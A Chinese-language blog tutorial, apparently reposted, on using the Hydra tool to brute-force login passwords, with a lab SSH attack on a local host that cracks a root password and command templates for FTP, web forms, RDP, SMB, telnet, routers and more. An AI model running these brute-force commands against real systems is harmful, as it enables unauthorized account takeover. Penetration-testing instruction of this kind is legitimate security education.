九头蛇密码爆破工具-hydra

渗透测试:九头蛇(hydra)密码爆破工具

先要测试8.240哪些端口是正常的:

 

 

下载hydra:

1010 2023-09-27 10:57:48 root wget http://www6.atomicorp.com/channels/atomic/centos/7/x86_64/RPMS/hydra-8.0-2.el7.art.x86_64.rpm
1011 2023-09-27 10:57:55 root ls
1012 2023-09-27 10:58:07 root yum install -y hydra-8.0-2.el7.art.x86_64.rpm
1013 2023-09-27 11:00:04 root hydra

 说明已经有了hydra命令了::::::::::::::::::

准备测试文件:

─# echo -e "xyz\nabc\nedf\n123456\nroot\nabcdefg" >users.txt

┌──(root㉿hydra)-[/opt/hydra]
└─# ls
users.txt

┌──(root㉿hydra)-[/opt/hydra]
└─# cat users.txt
xyz
abc
edf
123456
root
abcdefg

echo -e "123456\nabcdefg\nabc\n123\nabc" >passwd.txt    

准备的用户和密码文件如下:

 执行爆破密码如下:

hydra -L users.txt -P passwd.txt -t 4 192.168.8.240 ssh -s 22
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-27 02:15:00
[DATA] max 4 tasks per 1 server, overall 4 tasks, 30 login tries (l:6/p:5), ~8 tries per task
[DATA] attacking ssh://192.168.8.240:22/
[22][ssh] host: 192.168.8.240 login: root password: abcdefg
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-27 02:15:02

适合自己测试使用,在生产环境最好不要用,否则属于非法的操作,慎用!!!!!!!!!!!!!!!

 修改一下:

sed -i 's/123456//g' passwd.txt 

说明被删除了

 将源主机240密码修改为abcdefg

在123456上一行添加abcdefg这些内容

sed -i '/123456/i abcdefg' passwd.txt 

可以看出8.240主机密码已变为“abcdefg”

 -l login 小写,指定用户名进行破解

-L file 大写,指定用户的用户名字典

-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。

-P file 大写,用于指定密码字典。

-e ns 额外的选项,n:空密码试探,

s:使用指定账户和密码试探

-M file 指定目标ip列表文件,批量破解。

-o file 指定结果输出文件

-f 找到第一对登录名或者密码的时候中止破解。

-t tasks 同时运行的线程数,默认是16

-w time 设置最大超时时间,单位 -v / -V 显示详细过程

-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)

-x 自定义密码。

 

学神丶键仙 编码安全研究 2023-04-09 15:10 发表于北京

美国漫威漫画旗下的超级反派组织—hydra(九头蛇),大家对它还有印象吗?

HYDRA是著名组织THC的一款开源的暴力破解密码工具,其功能非常强大的;

图片

密码能否破解的关键,在于字典是否强大以及电脑的性能。

今天我们就来详细的介绍一下,这个装备到底该如何使用?

图片

1

使用方法

语法:Hydra 参数 IP 服务

参数:-l login 小写,指定用户名进行破解-L file 大写,指定用户的用户名字典-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。-P file 大写,用于指定密码字典。-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探-M file 指定目标ip列表文件,批量破解。-o file 指定结果输出文件-f 找到第一对登录名或者密码的时候中止破解。-t tasks 同时运行的线程数,默认是16-w time 设置最大超时时间,单位-v / -V 显示详细过程-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)-x 自定义密码。

 

service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。注意点:1.自己创建字典,然后放在当前的目录下或者指定目录。2.参数可以统一放在最后,格式比如hydra ip 服务 参数。3.如果能确定用户名一项时候,比如web登录破解,直接用 -l就可以,然后剩余时间破解密码。4.缺点,如果目标网站登录时候需要验证码就无法破解。5.man hydra最万能。6.或者hydra -U http-form等查看具体帮助。

 

2

环境介绍

攻击机:kali装有hydra工具 
靶机:192.168.154.131安装ssh服务,正常运行

 

为了测试方便,我们创建两个简单的字典文件,如下:

图片

 

3

开始爆破

根据命令参数,组织参数格式如下:

root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh

 

4

破解成功

       因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。

 

5

测试登录

使用得到的用户名/密码登录服务器,登录成功

图片

 

6

各种协议破解汇总

FTP协议破解

破解ftp: hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -v

http协议破解

 

get方式提交,破解web登录: hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns IP地址 http-get /admin/ hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php 
post方式提交,破解web登录:
hydra -f -l 用户名 -P 密码字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"
#/index.php …这个是登录的 url #后门是POST的数据 其中的用户名密码使用 USER PASS 来代替#然后是如果登录出错 会出现的字符 。。。然后开始破解

 

https协议破解

破解https hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https

路由器破解

hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get / -l admin 为尝试破解的用户名。# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为破解方式(协议)

 

http-proxy协议破解

破解http-proxy:hydra -l admin -P 字典.txt http-proxy://IP地址

 

smb破解

 

破解smb: hydra -l 用户名字典 -P 密码字典 IP地址 smb

Windows远程桌面

破解rdp(windows远程登录):hydra ip地址 rdp -l administrator -P 密码字典.txt -V 

 


邮箱pop3

破解邮箱pop3:hydra -l 用户名 -P 密码字典.txt my.pop3.mail pop3 

 

telnet破解

hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V 

 

语音通讯工具teamspeak

hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeak 

cisco

hydra -P 密码字典 IP地址 cisco hydra -m cloud -P 密码字典 IP地址 cisco-enable

 

到这里就结束了,kali下是默认安装的,几乎支持所有协议的在线破解,大家也可以尝试一下 

 

注:如有侵权请联系删除

图片

   学习更多技术,关注我:   

编码安全研究
专注于学习网络安全
觉得文章不错给点个‘再看’吧。
收录于合集 #web安全
 63
上一篇一次获取webshell的经历下一篇干货 | 一次实战中对tp5网站getshell方式的测试
阅读 606
 
posted @ 2023-04-11 22:34  往事已成昨天  阅读(374)  评论(0编辑  收藏  举报